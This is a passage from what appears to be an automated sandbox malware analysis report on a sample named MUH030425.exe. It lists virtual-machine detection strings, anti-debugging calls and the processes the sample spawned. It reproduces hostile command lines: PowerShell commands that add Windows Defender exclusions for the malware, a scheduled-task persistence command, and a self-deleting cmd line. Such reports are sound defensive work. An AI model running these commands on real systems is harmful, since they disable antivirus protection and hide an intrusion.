              Source: Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00L
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000641000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: Spectrum.exe, 0000001F.00000003.1523593271.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Virtualization Infrastruct
              Source: ssh-agent.exe, 00000020.00000002.2646457093.000000000045C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000632000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000003.1523593271.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000641000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: nfNECVMWar VMware SATA CD00NDIS Virtual Net
              Source: Spectrum.exe, 0000001F.00000002.2647404908.000000000059C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Device
              Source: Spectrum.exe, 0000001F.00000003.1519718828.00000000005D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ]SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000r
              Source: RegSvcs.exe, 00000008.00000002.1601150507.0000000001243000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l,-VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device'{0a56815Nl\
              Source: snmptrap.exe, 0000001E.00000002.2645215189.0000000000523000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
              Source: Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
              Source: Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 4NECVMWar VMware SATA CD00
              Source: Spectrum.exe, 0000001F.00000003.1519615034.00000000005C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: g\VMware Virtual USB MouseC:\Windows\System32\DDORes.dll,-2212
              Source: SensorDataService.exe, 0000001D.00000003.1514369055.0000000000630000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: b2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
              Source: Spectrum.exe, 0000001F.00000003.1519718828.00000000005D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ]SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Spectrum.exe, 0000001F.00000003.1519718828.00000000005D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00
              Source: Spectrum.exe, 0000001F.00000003.1519779192.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000003.1519475077.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000003.1519615034.00000000005CD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverD
              Source: SensorDataService.exe, 0000001D.00000003.1513698879.0000000000641000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .inVMware Virtual disk SCSI Disk Devicet System Management2
              Source: Spectrum.exe, 0000001F.00000003.1523593271.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000001F.00000002.2647404908.00000000005C3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
              Source: Spectrum.exe, 0000001F.00000003.1519475077.00000000005B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVMware Virtual disk SCSI Disk Device
              Source: Spectrum.exe, 0000001F.00000003.1519906958.00000000005B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft Basic Display Driverkname%;Microsoft Basic Display Driverosoft Hyper-V Gener:#[
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C61361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_02C61361
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcessId,8_2_00416B94
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040B15C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,8_2_0040B15C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00407A34 mov eax, dword ptr fs:[00000030h]8_2_00407A34
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00465794 mov eax, dword ptr fs:[00000030h]8_2_00465794
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C21130 mov eax, dword ptr fs:[00000030h]8_2_02C21130
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C63F3D mov eax, dword ptr fs:[00000030h]8_2_02C63F3D
              Source: C:\Users\user\Desktop\MUH030425.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C61361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_02C61361
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C64C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_02C64C7B
              Source: C:\Users\user\Desktop\MUH030425.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe"
              Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wBBaygjR.exe"
              Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe"
              Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wBBaygjR.exe"
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtOpenKeyEx: Indirect: 0x140077B9B
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtQueryValueKey: Indirect: 0x140077C9F
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtClose: Indirect: 0x140077E81
              Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe"
              Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wBBaygjR.exe"
              Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp"
              Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "RegSvcs.exe"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_02C48550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW,8_2_02C48550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: GetLocaleInfoA,8_2_00404B4C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Users\user\Desktop\MUH030425.exe | Queries volume information: C:\Users\user\Desktop\MUH030425.exe VolumeInformation
              Source: C:\Users\user\Desktop\MUH030425.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\MUH030425.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\MUH030425.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\MUH030425.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\alg.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\AppVClient.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe | Queries volume information: C:\Users\user\AppData\Roaming\wBBaygjR.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
